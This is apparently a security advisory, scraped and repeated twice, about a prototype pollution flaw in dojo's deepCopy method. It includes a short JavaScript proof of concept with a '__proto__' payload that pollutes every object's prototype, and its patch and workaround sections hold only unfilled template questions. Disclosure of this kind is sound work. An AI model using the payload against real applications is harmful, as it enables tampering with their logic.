Impact
Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values.
The deepCopy
method within dojo is vulnerable to Prototype Pollution
Proof Of Concept
require(["dojo/request/util"], function(lang) {
var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
var a = { b: "c", d: "e" };
var newOjb = lang.deepCopy(a, JSON.parse(malicious_payload));
console.log({}.vulnerable);
})
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory:
Impact
Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values.
The
deepCopy
method within dojo is vulnerable to Prototype PollutionProof Of Concept
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory: